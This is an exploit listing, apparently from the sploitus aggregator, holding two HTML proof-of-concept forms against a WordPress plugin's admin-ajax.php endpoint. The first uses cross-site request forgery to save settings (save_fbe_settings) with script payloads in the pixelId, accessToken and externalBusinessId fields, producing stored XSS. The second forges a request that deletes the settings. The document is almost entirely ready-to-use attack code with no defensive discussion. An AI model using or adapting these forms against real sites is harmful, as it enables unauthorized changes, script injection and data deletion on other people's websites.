Share
## https://sploitus.com/exploit?id=WPEX-ID:169D21FC-D191-46FF-82E8-9AC887AED8A4
CSRF to XSS
<html>
<body>
<form action="[TARGETSITE]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="save_fbe_settings" />
<input type="hidden" name="pixelId" value="<script>alert(0)</script>" />
<input type="hidden" name="accessToken" value="<script>alert(0)</script>" />
<input type="hidden" name="externalBusinessId" value="<script>alert(0)</script>" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
CSRF to Delete settings
<html>
<body>
<form action="[TARGETSITE]/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="delete_fbe_settings" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>